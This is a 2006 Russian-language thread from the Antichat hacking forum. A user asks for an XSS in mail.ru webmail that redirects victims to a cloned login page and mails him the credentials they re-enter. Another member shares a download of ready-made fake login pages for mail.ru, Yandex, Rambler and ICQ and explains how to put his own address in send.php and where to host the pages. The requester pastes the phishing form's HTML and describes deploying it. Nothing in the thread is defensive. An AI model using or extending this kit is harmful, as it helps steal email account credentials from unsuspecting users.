ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

нужна активная XSS в почте mail.ru
  #1  
Старый 05.11.2006, 19:30
Аватар для qwert125
qwert125
Новичок
Регистрация: 30.10.2006
Сообщений: 20
Провел на форуме:
77416

Репутация: 1
По умолчанию нужна активная XSS в почте mail.ru

Подскажите скрипт который можно было бы отправить по мылу при открытии которого жертву перебрасывало бы на мою страничку клон-страницы которую выдает mail.ru ри вводе не правильного пароля
и скрипт для этой странички чтобы заново введеные данные отправлялись мне на мыло
Наверняка кто нибудь такое делал
 
Ответить с цитированием

  #2  
Старый 05.11.2006, 19:49
Аватар для porter
porter
Познающий
Регистрация: 01.03.2005
Сообщений: 80
Провел на форуме:
606375

Репутация: 12
По умолчанию

Врятли тебе такое напишут....
Максимум что ты можешь сделать так это самому такое сварганить либо купить этот скрипт..
 
Ответить с цитированием

  #3  
Старый 05.11.2006, 20:19
Аватар для qwert125
qwert125
Новичок
Регистрация: 30.10.2006
Сообщений: 20
Провел на форуме:
77416

Репутация: 1
По умолчанию

так зачем же писать,может у кого уже есть готовое?
 
Ответить с цитированием

  #4  
Старый 05.11.2006, 21:28
Аватар для Undernative
Undernative
Постоянный
Регистрация: 16.05.2006
Сообщений: 449
Провел на форуме:
3383265

Репутация: 843
Отправить сообщение для Undernative с помощью ICQ Отправить сообщение для Undernative с помощью Yahoo
По умолчанию

http://dump.ru/files/8/8651969201/

Мои фейковые страница для
-mail.ru
-yandex.ru
-rambler.ru
-ICQ

в файле form.php смени мыло вместо beast-6@*****.ru на свое...и сливай все содержимое на домены holm.ru там лучше всего пашет

А на счет отправки письма используй либо Outlook ,в нем юзай гиперссылку чтобы скрыть ссылку ,либо пиши скрипт,его я не могу тебе написать.Ибо это сделай сам.
 
Ответить с цитированием

  #5  
Старый 05.11.2006, 21:33
Аватар для nc.STRIEM
nc.STRIEM
Members of Antichat - Level 5
Регистрация: 05.04.2006
Сообщений: 1,066
Провел на форуме:
3493315

Репутация: 1228


Отправить сообщение для nc.STRIEM с помощью ICQ
По умолчанию

Цитата:
Сообщение от qwert125  
так зачем же писать,может у кого уже есть готовое?
Это те нужна активная XSS в почте mail.ru! Такие вещи всегдща есть, но те которые попадают в паблик долго не живут! поэтому кто знает тот молчит! хотя за деньги скажут))
 
Ответить с цитированием

  #6  
Старый 05.11.2006, 23:05
Аватар для porter
porter
Познающий
Регистрация: 01.03.2005
Сообщений: 80
Провел на форуме:
606375

Репутация: 12
По умолчанию

nc.STRIEM сам знаешь?
 
Ответить с цитированием

  #7  
Старый 05.11.2006, 23:28
Аватар для qwert125
qwert125
Новичок
Регистрация: 30.10.2006
Сообщений: 20
Провел на форуме:
77416

Репутация: 1
По умолчанию

Цитата:
Сообщение от RemaerD  
http://dump.ru/files/8/8651969201/

Мои фейковые страница для
-mail.ru
-yandex.ru
-rambler.ru
-ICQ

в файле form.php смени мыло вместо beast-6@*****.ru на свое...и сливай все содержимое на домены holm.ru там лучше всего пашет

А на счет отправки письма используй либо Outlook ,в нем юзай гиперссылку чтобы скрыть ссылку ,либо пиши скрипт,его я не могу тебе написать.Ибо это сделай сам.
че то я в файле form.php не нашел beast-6@*****.ru
PHP код:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">  <!-- saved from url=(0073)http://lineage2world.jino-net.ru/-%20Lineage2World_com%20-_files/form.php -->  <HTML><HEAD>  <META http-equiv=Content-Type content="text/html; charset=windows-1251"><LINK   href="form.files/dubie.css" type=text/css rel=stylesheet>  <META content="MSHTML 6.00.2800.1106" name=GENERATOR></HEAD>  <BODY style="FONT-SIZE: 15px; FONT-FAMILY: Verdna" bgColor=#ffffff leftMargin=0   topMargin=0>  <FORM action=send.php method=post>  <P>Логин :&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <INPUT size=30 name=Name><tr><td class=form width=100%>  <td><select size=1 name=Domain class=long tabindex=2>  <option value=mail.ru >@mail.ru</option><option value=inbox.ru >@inbox.ru</option><option value=bk.ru >@bk.ru</option><option value=list.ru >@list.ru</option>  </select></td>  </table>  </td>  </tr></P>  <P>Пароль:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <INPUT type=password   size=30 name=Email></P>  <BR><BR>  <CENTER><INPUT type=submit value=Войти> </CENTER></FORM></BODY></HTML> 

а потом, я то залью mail.htm а form.php куда заливать то?
 
Ответить с цитированием

  #8  
Старый 06.11.2006, 00:29
Аватар для Fixer
Fixer
Новичок
Регистрация: 30.10.2006
Сообщений: 3
Провел на форуме:
22277

Репутация: 3
По умолчанию

тебе сюда! http://forum.antichat.ru/threadedpost217073.html#post217073
 
Ответить с цитированием

  #9  
Старый 06.11.2006, 00:33
Аватар для Undernative
Undernative
Постоянный
Регистрация: 16.05.2006
Сообщений: 449
Провел на форуме:
3383265

Репутация: 843
Отправить сообщение для Undernative с помощью ICQ Отправить сообщение для Undernative с помощью Yahoo
По умолчанию

Цитата:
че то я в файле form.php не нашел beast-6@*****.ru
Цитата:
потом, я то залью mail.htm а form.php куда заливать то?
1.CОрри напутал...в файле send.php
2.Допустим папка mail.ru ,все что в ней есть сливай на хост и все
 
Ответить с цитированием

  #10  
Старый 06.11.2006, 00:35
Аватар для qwert125
qwert125
Новичок
Регистрация: 30.10.2006
Сообщений: 20
Провел на форуме:
77416

Репутация: 1
По умолчанию

За то я нашел в файле send.php beast-6@yandex.ru поменял его на свой и все содержимое папки залил на holm.ru но ни хера не получается,правда я страницу mail.htm свою залил,потому как в твоей три орфографические ошибки,не знаю на сколько это важно...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Активная XSS на mail.ru Dronga E-Mail 69 05.04.2008 01:56
Маленькая активная XSS в Infinity GB v2.0 stable _kREveDKo_ Форумы 0 31.07.2006 23:04
Xss на mail.ru em00s7 E-Mail 14 08.06.2006 00:38
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ